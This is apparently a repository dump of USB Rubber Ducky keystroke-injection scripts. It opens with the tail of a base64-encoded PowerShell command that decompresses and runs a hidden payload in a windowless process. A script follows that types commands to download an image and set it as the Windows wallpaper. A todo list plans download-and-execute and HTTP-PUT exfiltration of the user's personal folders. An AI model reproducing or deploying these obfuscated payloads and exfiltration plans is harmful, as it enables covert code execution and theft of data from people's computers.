A3AEsAVABYADgAUgBYAHYAQQB6AFoAKwAxAFoASQBJADMAegB4ADIAbgBrAFYARAA1AEUAOAB0AGwAUQBzAHgARQBPAGgAbgBJADMAawBrAGMASABLAEoARQBpAFYAWAByAEwAVABKADIAUgBKADcAMwBSAEIAUAB6AGcAMABUAFgAOAAzADkAaAA0ADEATgBtAEMAVAAwAGsAQwB1AC8ASQBJAGIAOABpAG8AagBEADYANgBHAEcAbQBWAGUAUAB2AFcAMABjAEkAYgBJADIAUwA4AEwAbQBKAHYATABBAE8AMwA5ADEAMgBJAEsAeABnAHQAOQAyAEwAMABXAFYASQBKACsAQgBuAHYAcQBUAGQAeQAyADcAZgAyAGgANQAvAFkAMABZAGEAegBYAGEATwBMAHgASAA1ADIAWgByAC8AVgBkAG4AVQB2AEwAeQBLAFAAdwBGAG0ARwBoAG4AcQA1AFEAOQBVADAAVgA4ADgAZABjAHAAWgBpAHAAcwBIAHoAOABLAHoAYQBvAGoAeABCAEIAQgA0AGwAOABHAHkANQBYAEUASQBTAEkAYQBuAFAAKwBuAFAAVgBTAGUARgB0AGMATwByAFkANwBBAEYAaAB3AC8AQwBxADgAKwBLAG8AdwBUADAASgBOAHIANAAwADcAcwB2AFMAKwAvAGMAcgBpAEIARgB1AHQAWgAzAFcARwBxAE0AawBwAEYARgBUAE8ARgB3AEoAQQByAFIAZwA0AGQAQQBWAEkATQBQAHYAegA2AHEAWABaAGsAYwBlAEQARABWAFoAQQA2ADkAQQBPAGQAawBsAGwAZAAwAEcAdQArAFIAcQA1AGIATABRAC8AMAArAG8AegBoAGQAcgBCAEQALwBCAHYAMABIADEAWgBlADAAZgBkAHIAOABMAFAAcQBGADUAUwB2AGUAcgA1AGIAOAB2AC8AQgBDAGEAUAA1AGkANAA2ADIARQBLAGMAaQBaADAAQgBvAEoATwByADUATwBYADgAegArAHoANAB0AGsAYgBqAHQAVQBFAHEAcgA0ADUAZgArAHcASgBQAGkAMwBwADIAdwBrADgANwBkADYAOAAvAGcAcwBhAHEAcQBxAGYANwBBAHMAQQBBAEEAPQA9ACcAJwApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQAnADsAJABzAC4AVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAPQAkAGYAYQBsAHMAZQA7ACQAcwAuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAcAB1AHQAPQAkAHQAcgB1AGUAOwAkAHMALgBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAPQAnAEgAaQBkAGQAZQBuACcAOwAkAHMALgBDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAPQAkAHQAcgB1AGUAOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAYQByAHQAKAAkAHMAKQA7AA== 58 | DELAY 500 59 | ENTER 60 | -------------------------------------------------------------------------------- /scripts/wip/wallpaper-change.txt: -------------------------------------------------------------------------------- 1 | REM | WALLPAPER-CHANGE 2 | REM | 3 | REM | This is a script to download and change the wallpaper in Windows 10 4 | REM | 5 | REM | In order to work: 6 | REM | - Windows must be using the default "Photos" app for opening photos 7 | REM | - Internet Explorer was used at least once (and initial setup pop-ups, etc, are not present) 8 | REM | 9 | REM | See all "REM ~~" tilde lines below for code that needs to be modified 10 | REM | 11 | REM | Written by JeffTadashi (based off other Hak5 sources) 12 | REM | https://github.com/JeffTadashi/luk-ducky 13 | REM | 14 | REM | 15 | REM | 16 | REM | 17 | DELAY 1000 18 | CONTROL ESCAPE 19 | DELAY 2000 20 | REM ~~Change link below to whatever you want the downloaded image/wallpaper to be 21 | STRING iexplore http://www.thecuriosityworkshop.com/wp-content/uploads/2015/03/01-rubberduck-hongkong.jpg 22 | DELAY 5000 23 | ENTER 24 | REM (Delay below waits for IE to open. To be safe, it's fairly long) 25 | DELAY 9000 26 | REM (Typing CNTL + 1 to switch to first tab. Sometimes IE opens a second tab on first startup) 27 | CONTROL 1 28 | DELAY 500 29 | CONTROL s 30 | DELAY 2000 31 | ENTER 32 | DELAY 500 33 | REM (Now trying to close IE) 34 | ALT F4 35 | REM (General wait until next step) 36 | DELAY 8000 37 | CONTROL ESCAPE 38 | DELAY 2000 39 | REM ~~Change string below to match the filename of the image downloaded. This uses search, so best that the image has a unique name. 40 | STRING 01-rubberduck-hongkong.jpg 41 | DELAY 5000 42 | ENTER 43 | REM (This is the wait for Photos album to open) 44 | DELAY 8000 45 | TAB 46 | DELAY 80 47 | TAB 48 | DELAY 80 49 | TAB 50 | DELAY 80 51 | TAB 52 | DELAY 80 53 | TAB 54 | DELAY 80 55 | TAB 56 | DELAY 80 57 | TAB 58 | DELAY 80 59 | TAB 60 | DELAY 80 61 | TAB 62 | DELAY 80 63 | TAB 64 | DELAY 80 65 | TAB 66 | DELAY 80 67 | ENTER 68 | DELAY 500 69 | DOWN 70 | DELAY 80 71 | DOWN 72 | DELAY 80 73 | DOWN 74 | DELAY 80 75 | DOWN 76 | DELAY 80 77 | DOWN 78 | DELAY 80 79 | DOWN 80 | DELAY 80 81 | ENTER 82 | DELAY 500 83 | DOWN 84 | DELAY 80 85 | ENTER 86 | DELAY 500 87 | ALT F4 88 | -------------------------------------------------------------------------------- /todo.md: -------------------------------------------------------------------------------- 1 | TODO 2 | ============ 3 | - Create script: simple download and execute (no admin, no disable defender needed) 4 | - Create script: HTTP-PUT upload zip'd user downloads, desktop, and documents folders --------------------------------------------------------------------------------